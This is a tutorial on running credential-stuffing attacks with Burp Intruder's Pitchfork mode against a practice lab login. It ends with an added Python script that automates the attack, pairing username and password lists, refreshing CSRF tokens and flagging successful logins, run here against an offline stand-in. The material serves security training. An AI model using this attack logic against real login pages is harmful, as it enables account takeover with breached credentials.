Credential stuffing using a Burp Intruder Pitchfork attack
Last updated: January 27, 2023
Read time: 4 Minutes
Burp Intruder provides a number of different attack types, which determine the way in which payloads are injected into the defined payload positions.
The Pitchfork attack type is useful in cases where an attack requires you to send specific combinations of payloads from different lists in the same request.
In this tutorial, you'll learn:
- How a pitchfork attack works
- How to configure a basic pitchfork attack with two sets of payloads
- How to perform a credential stuffing attack
What is credential stuffing?
Credential stuffing is a form of brute-force attack in which an attacker attempts to log in to a site using a dictionary of known username:password pairs from one or more other sites. These sets of credentials are typically obtained via earlier data breaches, and the attack works because many users reuse the same password across sites.
Pitchfork attacks are ideal for this purpose because each username is sent with its matching password: the first item from each payload list is sent together, then the second item from each list, and so on, until the shortest payload list is used up. The number of requests is therefore the length of the shortest list, not the product of the list lengths as it would be in a Cluster bomb attack.
You'll perform an attack just like this in the following tutorial.
Burp's browser is an easy way to proxy HTTP traffic - even over the encrypted HTTPS protocol. There is no setup required - simply go to the Proxy tab, click Open Browser, and ensure Intercept is off.
Step 1: Open the lab
Using Burp's browser, access the following lab:
While this lab is not intended to demonstrate this attack, it does feature a simple login form that we can use as an example.
Step 2: Send a login request to Burp Intruder
In the lab, click the My account link to open the login page. Submit the login form using any arbitrary values.
In Burp Suite, go to the Proxy > HTTP history tab. Find the POST /login request and send it to Burp Intruder.
Step 3: Select the attack type
At the top of the Positions sub-tab, use the Attack type drop-down menu to select Pitchfork.
Step 4: Configure the payload positions
Click on the Intruder tab and go to the sub-tab containing your request.
On the Intruder > Positions sub-tab, you can see the request with § markers automatically inserted around everything Burp has identified as a potential insertion point. This may include things like cookies that you do not want to replace with a payload. Use the Clear § button to remove all of these.
In our example, we are only replacing the username and password.
Highlight the value of the username parameter and click Add §. Do the same for the password parameter.
Step 5: Add the username payloads
Go to the Payloads sub-tab.
At the top of the tab is the Payload Sets option. This lets you switch between the different sets of payloads and configure each one.
For a Pitchfork attack, you need to configure the same number of payload sets as payload positions: payload set 1 is used for the first position in the request, payload set 2 for the second, and so on.
Select Payload set 1, then paste the list of candidate usernames into the Payload Options field.
Step 6: Add the password payloads
Select Payload set 2, then paste the list of candidate passwords into the Payload Options field.
Step 7: Start the attack
Click Start Attack. A new Intruder attack window opens. Here, you can see the requests made by Intruder in real-time.
Step 8: Analyze the results
You can sort the results of the attack by any column, and apply filters by clicking the Filter bar. This can help you to spot differences between responses and patterns of results.
In our example, you can see that the combination of wiener:peter is the only one to return a 302 status code.
If you examine the response to this login, you can see that the server sent a new session cookie. A redirect combined with a freshly issued session cookie is a strong sign that the login was successful.
Subsequent login attempts receive a 400 error response because Intruder replays the session cookie and CSRF token captured in the original request, and that token no longer corresponds to the server's new session ID. If you need to keep testing pairs after a hit, fetch a fresh login page (and therefore a fresh token) before each attempt, for example with a session handling rule and macro in Burp's Sessions settings, or re-capture the request and resume the attack from the remaining payloads.
In addition to sorting the results, you can also configure Grep settings on the Options tab to flag results that match a pattern of text or extract text that matches a pattern.
Step 9: Confirm your results
In the browser, go back to the login page and log in using the credentials wiener:peter to confirm that you have successfully identified a valid set of login credentials.
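The following script is an added example, not PortSwigger's code or the lab's, that reproduces the logic of Steps 3 to 9 outside Burp: a pitchfork() pairing of the two payload lists (with cluster_bomb() for contrast), CSRF token extraction from the login page, and a run_attack() loop that flags a hit on the same signal used in Step 8 (a 302 plus a newly issued session cookie). The HTTP layer is injected, so the script runs offline against a constructed FakeLab stand-in that behaves like the lab's login endpoint as described in Step 8: a correct login rotates the session, and replaying the old token then yields 400. The candidate lists, the csrf field name, the /login path and the FakeLab behaviour are assumptions for the example.

```python
"""Credential stuffing in the style of Burp Intruder's Pitchfork attack.

Added example, not code from the tutorial or the lab. The transport is
injected so the attack logic can be exercised offline against FakeLab.
"""
import itertools
import re
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlencode

# Constructed candidate lists (assumption). wiener:peter is the lab account
# confirmed in Step 9; the other entries are filler.
USERNAMES = ["carlos", "wiener", "administrator"]
PASSWORDS = ["montoya", "peter", "admin"]


def pitchfork(usernames, passwords) -> List[Tuple[str, str]]:
    """Pitchfork: i-th username with i-th password; stops at the shorter list."""
    return list(zip(usernames, passwords))


def cluster_bomb(usernames, passwords) -> List[Tuple[str, str]]:
    """Cluster bomb, for contrast: every combination (|U| x |P| requests)."""
    return list(itertools.product(usernames, passwords))


@dataclass
class Response:
    status: int
    headers: Dict[str, str]
    body: str = ""


CSRF_RE = re.compile(r'name="csrf"\s+value="([^"]+)"')  # assumed field name


def extract_csrf(html: str) -> str:
    m = CSRF_RE.search(html)
    if not m:
        raise ValueError("login page carries no csrf field")
    return m.group(1)


def session_from(cookie_header: Optional[str]) -> Optional[str]:
    m = re.search(r"session=([^;]+)", cookie_header or "")
    return m.group(1) if m else None


def run_attack(transport, pairs, fresh_token_each_time=True):
    """Return one (user, password, status, got_new_session) tuple per attempt.

    fresh_token_each_time=False replays the single session/token captured at
    the start, which is what a raw Intruder attack does (see Step 8).
    """
    results, session, token = [], None, None
    for user, pw in pairs:
        if session is None or fresh_token_each_time:
            page = transport("GET", "/login", {}, None)
            session = session_from(page.headers.get("Set-Cookie"))
            token = extract_csrf(page.body)
        headers = {"Cookie": f"session={session}",
                   "Content-Type": "application/x-www-form-urlencoded"}
        body = urlencode({"csrf": token, "username": user, "password": pw})
        resp = transport("POST", "/login", headers, body)
        new_session = session_from(resp.headers.get("Set-Cookie")) is not None
        results.append((user, pw, resp.status, new_session))
    return results


def hits(results):
    """Step 8's success signal: a 302 plus a freshly issued session cookie."""
    return [(u, p) for u, p, status, new_session in results
            if status == 302 and new_session]


class FakeLab:
    """Constructed stand-in for the lab's login endpoint (not real traffic).

    GET /login issues a session cookie and a csrf token bound to it. POST /login
    answers 400 on a token/session mismatch, 200 on bad credentials, and on a
    correct login rotates the session (302 + new cookie), invalidating the old
    one, which is why replayed tokens fail afterwards.
    """
    VALID = {"wiener": "peter"}

    def __init__(self):
        self.sessions: Dict[str, str] = {}  # session id -> csrf token

    def __call__(self, method, path, headers, body):
        if method == "GET":
            sid, token = secrets.token_hex(8), secrets.token_hex(8)
            self.sessions[sid] = token
            return Response(200, {"Set-Cookie": f"session={sid}"},
                            f'<input type="hidden" name="csrf" value="{token}">')
        form = {k: v[0] for k, v in parse_qs(body or "").items()}
        sid = session_from(headers.get("Cookie"))
        if sid is None or self.sessions.get(sid) != form.get("csrf"):
            return Response(400, {}, "Invalid CSRF token")
        user = form.get("username")
        if user in self.VALID and self.VALID[user] == form.get("password"):
            del self.sessions[sid]
            new_sid = secrets.token_hex(8)
            self.sessions[new_sid] = secrets.token_hex(8)
            return Response(302, {"Location": "/my-account",
                                  "Set-Cookie": f"session={new_sid}"})
        return Response(200, {}, "Invalid username or password.")


if __name__ == "__main__":
    pairs = pitchfork(USERNAMES, PASSWORDS)
    print(f"pitchfork: {len(pairs)} requests, cluster bomb would need "
          f"{len(cluster_bomb(USERNAMES, PASSWORDS))}")
    for mode in (True, False):
        print("fresh token per attempt" if mode else "replayed token")
        for row in run_attack(FakeLab(), pairs, fresh_token_each_time=mode):
            print("  ", row)
    print("hits:", hits(run_attack(FakeLab(), pairs)))
```

Run with the replayed token and the statuses come out 200, 302, 400: the attempt after the hit fails exactly as the tutorial describes, because the old session was rotated away. With a fresh GET before each POST every pair is judged on its own merits, which is the behaviour to reproduce in Burp with a session handling rule if you expect more than one valid pair in your list.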
Congratulations, you have learned to configure pitchfork attacks and to use the Intruder Attack window to analyze the results.
In the wild, you may encounter additional defences, such as rate limiting, which make attacks like this more difficult. Why not check out the rest of our authentication-based materials on the Web Security Academy to learn more?